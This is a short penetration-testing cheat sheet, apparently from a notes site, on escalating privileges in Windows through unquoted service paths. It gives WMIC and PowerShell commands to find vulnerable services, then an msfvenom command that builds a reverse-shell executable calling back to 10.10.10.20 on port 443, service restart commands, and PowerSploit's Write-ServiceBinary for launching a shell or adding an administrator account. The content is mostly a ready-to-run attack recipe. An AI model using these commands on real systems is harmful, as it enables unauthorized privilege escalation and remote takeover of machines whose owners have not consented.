Unquoted Service Path

Search for Unquoted Path

The following command will search for all the paths except "C:\windows" since a normal user will not have executable permissions on this folder.

##  Windows Management Instrumentation Command-Line (WMIC)  ##
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

##  WMI (Powershell) ##
Get-WmiObject win32_service | select Name,PathName,StartMode,StartName | where {$_.StartMode -ne "Disabled" -and $_.StartName -eq "LocalSystem" -and $_.PathName -notmatch "`"" -and $_.PathName -notmatch "C:\\Windows"} | Format-List

If a service is found with unquoted path check the permissions of the service with icacls. If we have permissions on any of the folders that leads to the executable then we can escalate our privileges.

Create an executable msfvenom payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.20 LPORT=443 -f exe > /root/same_service_name_as_above.exe

Replace and restart service.

sc stop service_name
sc start service_name

Powersploit

Within powershell run the following.

# Find them
Get-ServiceUnquoted

# Execure a reverse shell or adding new user as administrator.
Write-ServiceBinary -name "Service_Name" -Path "C:\Service_name.exe"

Last updated